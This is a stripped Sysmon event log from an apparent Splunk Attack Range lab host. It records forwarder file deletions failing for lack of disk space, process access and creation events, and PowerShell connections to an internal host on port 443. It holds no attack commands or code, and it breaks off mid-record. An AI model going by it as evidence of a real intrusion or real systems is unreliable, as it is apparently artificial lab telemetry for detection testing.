Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15AD4275FBBB23DB3B5EA5E5DD5D5862,SHA256=8329C46BD0D4563BBE7B1447B89CF4B14999B78F30712A8C614298DC13731E27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:16.364{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25348A58438D6D71A1BB3BE5B204E59F,SHA256=48CAEFC4FE37E90F513DFC86C3813F4F2B6EC532BAD9FC71053702F3E677EB0F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:17.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA36B1DBAB2FF4E64A8887DBD17C3B82,SHA256=D97145C6DD16F4A8D94F21936173405E103C6D66196DF8B3690EE6DAAEB3C6F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:18.424{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC24430B94CDE92CBD8BD0272BB6F8E3,SHA256=74AEA29F6B686129286542A592F4766D5F10F2AC16B288BA9EE96EE66BCF7C55,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:19.815{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=62DC28D9740B0DBF88D1FA58817A1718,SHA256=67E3524FC9CD11009A259EFEBBC8B2AA703FF7359A242BAF037121124146F23C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:19.431{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA57A68F7F6F470EA023050E64549F57,SHA256=5071E849FDA5BE68CAC7C50061F2EC87B2D58234428DEEBE1796759FF879C794,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:20.448{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=026A2C046395A3819607D01CA4F14724,SHA256=B343238CBD947FF4A5A7E34877405480B5F44DCB4AAAB5C14691449B34F8B591,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:50.262{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50555-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:21.453{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA228F93DD88A994C2FAB5E1B8F8CB61,SHA256=96E89BB79A70EEBA7C008F7A027B00704E182862634262F5D442F3C14DE50777,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:50.715{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50556-false10.0.1.12-8000- 23542300x800000000000000036497623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:22.471{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3F3795FF4A03EA9800A8BD08B996EBB,SHA256=5EA1735462BF5D3747EA21852016C6D0C96238840BA06BD6C3DD8B2205104E01,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:23.486{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4492BE371DEE733F21A49902736D197A,SHA256=44E8D44B86D88B2318B65FA8E6B187C41FC1CB4697F9E64C90465D6786137C94,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:23.249{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=9EB9BA94991F8D1BA1860E5ACA587B61,SHA256=EF4B7F6E33583CD1EB4DF8532C4F9A6F7170863093880019C575E558C6228C19,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.900{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A120-6140-8956-04000000C801}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.900{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.900{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.900{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.900{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.900{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A120-6140-8956-04000000C801}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.900{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A120-6140-8956-04000000C801}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.885{B81B27B7-A120-6140-8956-04000000C801}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.784{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0A1DE11F75AF66BCA35ED16ED292C2EA,SHA256=57F7293B65DD97647DA0F0645DA49AB374CD8EC610E0109A67BCC52FAA72A21B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.500{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDF59153A58A6B01C63B5313ECD5BA3D,SHA256=F4620E6313AA16C8C3FD4BB8D29D00F30D4860116CA93A247E3ED62B123C4851,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.216{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A120-6140-8856-04000000C801}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.216{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.216{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.216{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.216{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.216{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A120-6140-8856-04000000C801}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.216{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A120-6140-8856-04000000C801}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.201{B81B27B7-A120-6140-8856-04000000C801}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:25.515{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83FE6D4908340BD6BACA6C278DEBD3A9,SHA256=7AD674BF1CCAB7E4C741975D9B822648CB3AA5A811E33142E9FF96197246F566,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:55.271{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50557-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:25.215{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1899D4BE6639D2E3096BA1E15CFE1DED,SHA256=0043F40F88FA106892A633986602A44DAA9C3EC4795668E5680907A4833D355C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:25.215{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D3B078DFCDC82DE2A251C97B3839848,SHA256=B80EA171D49CA32CB055625F536F4328EC739E8C6D6FA388D63A7B10F08056F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:25.049{B81B27B7-A120-6140-8956-04000000C801}3900916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:26.547{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B490EB52F4799CC2D13DC2ADB77EAC20,SHA256=FB61FA0EF76C567CC63B2A8C143A32BC5EEFDDB39885686DA5C77799C4249DEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:27.566{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80B0114F5EB18C3CE5F9EDED3D9E5EC7,SHA256=45980F54C1B50F919502B0AEDFCC1AF44FBDB7C116002D6F694480FD03E6895C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:56.731{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50558-false10.0.1.12-8000- 23542300x800000000000000036497653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 